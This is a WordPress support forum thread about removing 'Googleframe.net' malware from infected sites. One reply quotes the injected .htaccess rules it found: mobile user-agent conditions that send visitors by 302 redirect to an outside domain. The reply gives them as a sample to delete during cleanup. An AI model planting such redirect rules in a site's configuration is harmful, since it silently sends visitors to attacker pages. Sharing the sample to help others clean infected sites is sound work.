Googleframe.net – Malware
-
Does anyone know what to do when Customizer is infected by a malware called Googleframe.net (open a new window from the menu)
Regards
Thomas
-
Did you try Google?
Thanks for taking you time to answer.
Yes ! I have Googled the problem and end up here with different answers I do not understand so well.
I have tried to malware-scan my Customizer website with different Anti-malware plugins. I have bought access to Site-scanners. But since they only scan once every 24 hours, I haven heard anything yet. So I thought somebody could give an alternative solution 🙂
Regards
ThomasHi thomasskjold,
I am also having the same issue as you, and dunno what to do.
The site comes up as clean with all the “big name” malware scanners, and I ran a site security test which came back as “A”.
I have also been googling for an answer, and I am not coming up with anything. Let’s hope someone can help asap.
Cheers,
Alan
I suggest you both leave your site link here.
Do you have any security plugins installed? Try iThemes Security or WordFence. Not sure if they’ll help post-infection but may help you analyse what to do.
http://www.fanoe-vadehavsfestival.dk
Using Wordfence. But it doesn’t find anything
Kind regards
ThomasHi,
here’s a solution that worked for me: Go to your folder with WordPress installation and check the .htaccess fileMine contained these lines:
RewriteEngine on
RewriteCond %{HTTP_ACCEPT} “text/vnd.wap.wml|application/vnd.wap.xhtml+xml” [NC,OR]
RewriteCond %{HTTP_USER_AGENT} “acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-” [NC,OR]
RewriteCond %{HTTP_USER_AGENT} “dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-” [NC,OR]
RewriteCond %{HTTP_USER_AGENT} “maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv” [NC,OR]
RewriteCond %{HTTP_USER_AGENT} “palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany” [NC,OR]
RewriteCond %{HTTP_USER_AGENT} “sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo” [NC,OR]
RewriteCond %{HTTP_USER_AGENT} “teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi” [NC,OR]
RewriteCond %{HTTP_USER_AGENT} “wapp|wapr|webc|winw|winw|xda|xda-” [NC,OR]
RewriteCond %{HTTP_USER_AGENT} “up.browser|up.link|windowssce|iemobile|mini|mmp” [NC,OR]
RewriteCond %{HTTP_USER_AGENT} “symbian|iOS|midp|wap|phone|pocket|mobile|pda|psp|PPC|Android” [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ http://6.moby24.com [L,R=302]Delete them, check your /wp-content/themes/ and /wp-content/uploads/ directories and delete unwanted files that aren’t part of WordPress or your theme…. In my case there were also malicious folders /wp-system/ or /wp-mail/
Mine is http://www.scatterlingsofafrica.net and I am also using Wordfence, as well as Bulletproof, and can’t find any anomilies.
I have checked the htaccess, and don’t see anything.
Cheers,
A.
- The topic ‘Googleframe.net – Malware’ is closed to new replies.